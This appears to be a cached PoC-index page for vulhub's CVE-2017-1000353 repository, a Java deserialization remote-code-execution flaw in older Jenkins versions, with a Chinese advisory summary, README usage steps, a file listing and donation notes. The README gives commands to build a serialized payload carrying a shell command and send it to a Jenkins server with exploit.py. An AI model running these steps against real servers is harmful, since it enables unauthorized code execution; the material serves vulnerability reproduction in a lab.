CVE-2017-1000353 PoC — CloudBees Jenkins 代码问题漏洞

Source

https://github.com/vulhub/CVE-2017-1000353

Associated Vulnerability

Title:CloudBees Jenkins 代码问题漏洞 (CVE-2017-1000353)
Description:CloudBees Jenkins是美国CloudBees公司的一款基于Java开发的开源的、可持续集成的自动化服务器，它主要用于监控持续的软件版本发布/测试项目和一些定时执行的任务。LTS（Long-Term Support）是CloudBees Jenkins的一个长期支持版本。 CloudBees Jenkins 2.56及之前的版本和2.46.1 LTS及之前的版本中存在远程代码执行漏洞。远程攻击者可通过向Jenkins CLI传递序列化的Java ‘SignedObject’对象利用该漏洞绕过基

Description

jenkins CVE-2017-1000353 POC

Readme

# CVE-2017-1000353 POC

How to reproduce the Jenkins CVE-2017-1000353？

Clone this repository, use the pre-built payload `jenkins_poc.ser` with flowing command:

```
python exploit.py http://your-ip:8080 jenkins_poc.ser
```

Then the `touch /tmp/success` would be executed.

How to generate the payload `jenkins_poc.ser`？

Download [CVE-2017-1000353-SNAPSHOT-all.jar](https://github.com/vulhub/CVE-2017-1000353/releases/download/1.1/CVE-2017-1000353-1.1-SNAPSHOT-all.jar).

```
java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"
```

Referer:

https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2017-1000353

File Snapshot


 [4.0K]  /data/pocs/ada29b9ee00ba3da741b59fa94f99a82a00fd0fc
├── [  80]  CVE20171000353.iml
├── [2.0K]  exploit.py
├── [2.4K]  jenkins_poc.ser
├── [2.7K]  pom.xml
├── [ 648]  README.md
└── [4.0K]  src
    └── [4.0K]  main
        └── [4.0K]  java
            └── [4.0K]  org
                └── [4.0K]  vulhub
                    └── [5.8K]  Payload.java

5 directories, 6 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!